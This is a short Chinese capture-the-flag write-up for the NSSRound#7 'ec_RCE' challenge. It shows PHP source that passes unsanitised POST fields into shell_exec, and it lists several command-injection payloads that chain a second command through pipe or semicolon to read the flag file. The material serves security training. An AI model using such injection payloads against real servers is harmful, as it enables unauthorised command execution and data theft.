NSS [NSSRound#7 Team]ec_RCE

简介: NSS [NSSRound#7 Team]ec_RCE

NSS [NSSRound#7 Team]ec_RCE

源码如下:

<?PHP
    
    if(!isset($_POST["action"]) && !isset($_POST["data"]))
        show_source(__FILE__);

    putenv('LANG=zh_TW.utf8'); 

    $action = $_POST["action"];
    $data = "'".$_POST["data"]."'";

    $output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");
    echo $output;    
?>

题目有提到断言构造,问问人工智障。

解释一下shell_exec()

exec()与shell_exec():exec()与shell_exec()相似,都可以执行系统命令,不同的是返回结果不一样,前者返回最后一行,后者返回全部信息。直接使用两者返回是没有回显的。(执行不输出,输出得$a=shell_exec(命令);echo $a;)            //只有一个参数

所以我们只需要构造shell_exec(“/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar+管道符+命令”);就行了

action=||&data='cat /flag'
action=||cat%20&data=/flag
action=;cat /flag&data=


目录
相关文章
|
8天前
|
安全 Windows
遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
|
2月前
NSS [HNCTF 2022 WEEK2]ez_ssrf
NSS [HNCTF 2022 WEEK2]ez_ssrf
26 0
Enterprise search debugging via test report in AG3
Created by Wang, Jerry, last modified on Dec 19, 2014
Enterprise search debugging via test report in AG3
|
iOS开发 MacOS
Mac OS X El Capitan系统完整性保护System Integrity Protection (SIP)
引言:前段时间经历了XCode编译器代码被注入的事件后,这次 Mac OS X El Capitan系统的升级,启用了更高的安全性保护机制:系统完整性保护System Integrity Protection (SIP),是By Design?还是巧合呢?关于 系统完整性保护System Integrity Protection (SIP),可以从Apple官网下载下来学习,从第29页到54页
3010 0
SAP QM 可以控制到没有收到Vendor 的certificate的话就不能做UD.
SAP QM可以控制到没有收到Vendor 的certificate的话就不能做UD.   如下图,QA11试图为某个检验批做UD,系统提示错误,   解决方...
1032 0
|
安全 Go
Facebook, Google, and the Rise of Open Source Security Software
http://www.wired.com/2014/10/facebook-builder-osquery/ Facebook chief security officer Joe Su...
946 0